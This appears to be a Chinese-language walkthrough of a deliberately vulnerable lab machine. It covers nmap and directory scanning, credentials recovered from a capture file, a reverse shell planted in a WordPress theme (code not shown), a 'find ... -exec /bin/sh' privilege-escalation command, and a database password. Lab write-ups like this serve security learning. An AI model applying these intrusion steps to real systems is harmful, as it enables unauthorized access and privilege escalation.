一、信息收集
1、主機探測
arp-scan -l netdiscover -i eth0 -r 192.168.33.0/24 nmap -sP 192.168.66.0/24
2、端口掃描
nmap -sS -sV 192.168.66.141
PORT???STATE?SERVICE?VERSION
22/tcp?open??ssh?????OpenSSH?7.6p1?Ubuntu?4?(Ubuntu?Linux;?protocol?2.0)
80/tcp?open??http????Apache?httpd?2.4.29?((Ubuntu))
這里兩個端口,我們看看80端口,后臺掃一下目錄
3、目錄掃描
dirsearch -u http://192.168.66.141:80/ -e * -i 200 dirb http://192.168.66.141
Ⅰ、80端口訪問,尋找注入點
這個一眼wp,這個頁面沒啥東西的
這里嘗試爆破是失敗了,我們這里換方向了
cap是抓包產生的文件,我們丟到wireshark或者二進制文件可以得到一些信息
這里找到了賬戶密碼,我們看看這是什么加密 webdeveloper Te5eQg%264sBS%21Yr%24%29wf%25%28DcAd 這里是一個url解碼
進來了,對編碼有點不敏感,最近靶機打的太少了,因該多補補,為什么說我很熟悉wp呢,因為我的博客也是wp搭建的
Ⅱ、彈shell
這里來一條shell,這里有個小坑,就是前文已經給了閉合符號記得刪除閉合符號即可 還有一件事就是這里不要亂點更新,因為插入php代碼再新版本已經刪除了,不要亂點!
這里要注意很多細節,我們在主題添加的反彈shell,然后訪問一下index.php就能反彈到,很多小問題只能自己操作時才能感受到
Ⅲ、內網信息收集
先看看內核、root權限文件啥的,先收集收集信息
$?uname?-a
Linux webdeveloper 4.15.0-38-generic #41-Ubuntu SMP Wed Oct 10 10:59:38 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 這個內核很老的版本了,看看有沒有簡單的提權方式
這里有很多root權限文件,可以嘗試嘗試find命令提權 find / -name index.php -exec "/bin/sh" ; 做到這里我還有一個信息漏掉了,22端口,還沒嘗試這個端口是干嘛的 這里還是找配置文件 這里爆除了數據庫文件
Ⅲ、數據庫登錄
webdeveloper MasterOfTheUniverse
Ⅳ、sudo提權
這里直接在提權網站看一看,有個這東西,我們嘗試提權
提權成功,但是我沒有安裝自己的方式去提權,等后面有時間會把這個坑補上,但也加深了這個提權的方式